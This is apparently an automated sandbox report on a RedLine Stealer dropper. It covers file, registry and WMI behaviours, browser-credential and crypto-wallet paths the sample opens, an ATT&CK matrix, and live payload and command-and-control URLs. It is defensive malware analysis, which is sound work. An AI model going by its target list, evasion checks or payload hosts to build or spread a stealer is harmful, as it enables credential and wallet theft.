                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_00000001400C22A8 GetLocalTime,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,
                    Source: C:\Users\user\AppData\Roaming\325.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\325.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    Yara detected RedLine Stealer
                    Source: Yara match | File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\325.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\325.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Roaming\325.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Roaming\325.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\325.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: kS2dqbsDwD.exe | Binary or memory string: WIN_XP
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp | Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
                    Source: kS2dqbsDwD.exe | Binary or memory string: WIN_VISTA
                    Source: kS2dqbsDwD.exe | Binary or memory string: WIN_7
                    Source: kS2dqbsDwD.exe | Binary or memory string: WIN_8
                    Source: kS2dqbsDwD.exe | Binary or memory string: WIN_8.1
                    Source: Yara match | File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY

                    Remote Access Functionality:

                    Yara detected RedLine Stealer
                    Source: Yara match | File source: 2.2.325.exe.3b45a60.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.325.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.325.exe.3b45a60.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: Process Memory Space: 325.exe PID: 1784, type: MEMORY
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe | Code function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Spearphishing Link1 | Windows Management Instrumentation221 | Path Interception | Exploitation for Privilege Escalation1 | Disable or Modify Tools1 | OS Credential Dumping1 | System Time Discovery11 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
                    Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Access Token Manipulation1 | Deobfuscate/Decode Files or Information1 | Input Capture31 | Account Discovery1 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection12 | Obfuscated Files or Information3 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Screen Capture1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing23 | NTDS | System Information Discovery136 | Distributed Component Object Model | Input Capture31 | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Security Software Discovery451 | SSH | Clipboard Data2 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion231 | Cached Domain Credentials | Process Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Virtualization/Sandbox Evasion231 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection12 | Proc Filesystem | Application Window Discovery11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
                    Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop

                    Behavior Graph

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 452457 | Sample: kS2dqbsDwD | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100
                    Start
                      Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected RedLine Stealer; 5 other signatures
                      -> kS2dqbsDwD.exe (14) started
                           DNS/IP: iplogger.org 88.99.66.31, 443, 49711 HETZNER-ASDE Germany; is.gd 104.25.234.53, 443, 49712 CLOUDFLARENETUS United States; 4 other IPs or domains
                           Dropped: C:\Users\user\AppData\Roaming\325.exe, PE32
                           Signatures: Detected unpacking (changes PE section rights); May check the online IP address of the machine; Sample or dropped binary is a compiled AutoHotkey binary
                           -> 325.exe (3) started
                                Signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Performs DNS queries to domains with low reputation; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                -> 325.exe (15 30) started
                                     DNS/IP: yspasenana.xyz 212.224.105.105, 49739, 49741, 49742 DE-FIRSTCOLOwwwfirst-colonetDE Germany; api.ip.sb
                                     Signatures: Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

                    Screenshots

                    [Screenshot thumbnails are not reproduced in this text rendering.]

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label | Link
                    kS2dqbsDwD.exe | 20% | Virustotal | | Browse
                    kS2dqbsDwD.exe | 13% | ReversingLabs

                    Dropped Files

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\325.exe | 33% | ReversingLabs | ByteCode-MSIL.Infostealer.Reline

                    Unpacked PE Files

                    Source | Detection | Scanner | Label | Link | Download
                    0.1.kS2dqbsDwD.exe.140000000.0.unpack | 100% | Avira | HEUR/AGEN.1142275 | | Download File
                    14.2.325.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1140572 | | Download File

                    Domains

                    Source | Detection | Scanner | Label | Link
                    yspasenana.xyz | 1% | Virustotal | | Browse
                    api.ip.sb | 2% | Virustotal | | Browse

                    URLs

                    Source | Detection | Scanner | Label | Link
                    http://service.r | 0% | URL Reputation | safe
                    http://ahkscript.org | 1% | Virustotal | | Browse
                    http://ahkscript.org | 0% | Avira URL Cloud | safe
                    http://yspasenana.xyz/ | 1% | Virustotal | | Browse
                    http://yspasenana.xyz/ | 0% | Avira URL Cloud | safe
                    https://api.ip.sb/geoip | 0% | URL Reputation | safe
                    http://yspasenana.xyz4 | 0% | Avira URL Cloud | safe
                    http://tempuri.org/ | 0% | Avira URL Cloud | safe
                    http://ns.adobe.c/g | 0% | URL Reputation | safe
                    http://yspasenana.xyz:80/ | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/SetEnvironment | 0% | Avira URL Cloud | safe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | Avira URL Cloud | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://support.a | 0% | URL Reputation | safe
                    http://yspasenana.xyz | 0% | Avira URL Cloud | safe
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
                    http://ns.adobe.cobj | 0% | URL Reputation | safe
                    http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/SetEnviron | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://forms.rea | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/EnvironmentSettings | 0% | Avira URL Cloud | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe
                    http://go.micros | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    http://fontfabrik.com | 0% | URL Reputation | safe
                    https://d301sr5gafysq2.cloudfront.net; | 0% | Avira URL Cloud | safe
                    https://api.ipify.orgcookies//settinString.Removeg | 0% | Avira URL Cloud | safe
                    https://sectigo.com/CPS0C | 0% | URL Reputation | safe

                    Domains and IPs

                    Contacted Domains

Name                           | IP              | Active  | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com   | 52.217.201.169  | true    | false     |                     | high
yspasenana.xyz                 | 212.224.105.105 | true    | true      |                     | unknown
bitbucket.org                  | 104.192.141.1   | true    | false     |                     | high
iplogger.org                   | 88.99.66.31     | true    | false     |                     | high
is.gd                          | 104.25.234.53   | true    | false     |                     | high
bbuseruploads.s3.amazonaws.com | unknown         | unknown | false     |                     | high
api.ip.sb                      | unknown         | unknown | false     |                     | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://yspasenana.xyz/ | false | 1%, Virustotal; Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtab325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                high
                                http://service.r325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://duckduckgo.com/ac/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                  high
                                  https://is.gd/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                    high
                                    http://ahkscript.orgkS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://web-security-reports.services.atlassian.com/csp-report/bb-website;kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                      high
                                      https://api.ip.sb/geoip325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://yspasenana.xyz4325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/envelope/D325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmpfalse
                                        high
                                        http://tempuri.org/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          high
                                          http://ns.adobe.c/g325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://yspasenana.xyz:80/325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://tempuri.org/Endpoint/SetEnvironment325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.com325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Endpoint/GetUpdates325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://is.gd/bkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                            high
                                            https://support.google.com/chrome/?p=plugin_real325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/cThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://is.gd/nKi5S3HkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                high
                                                https://iplogger.org/ykS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://support.google.com/chrome/?p=plugin_pdf325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/VerifyUpdate325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.urwpp.deDPlease325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cn325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://forms.real.com/real/realone/download.html?type=rpsp_us325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://support.a325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://yspasenana.xyz325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://bitbucket.org/kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://support.google.com/chrome/?p=plugin_quicktime325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://ns.adobe.cobj325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.datacontract.org/2004/07/325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://bitbucket.org/luisadoma999/admin/downloads/325.exekS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.drfalse
                                                                    high
                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0skS2dqbsDwD.exefalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://bitbucket.org/luisadoma999/admin/downloads/325.exelqkS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/SetEnviron325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.carterandcone.coml325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.html325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://support.google.com/chrome/?p=plugin_shockwave325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://forms.rea325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponse325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://iplogger.org/1Spbs7%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://is.gd/nKi5S3$kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://aui-cdn.atlassian.comkS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://is.gd/nKi5S3%A_AppData%kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designersG325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.fontbureau.com/designers/?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.founder.com.cn/cn/bThe325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://support.google.com/chrome/?p=plugin_wmp325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.sectigo.com0kS2dqbsDwD.exefalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers?325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://support.google.com/chrome/answer/6258784325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Endpoint/EnvironmentSettings325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
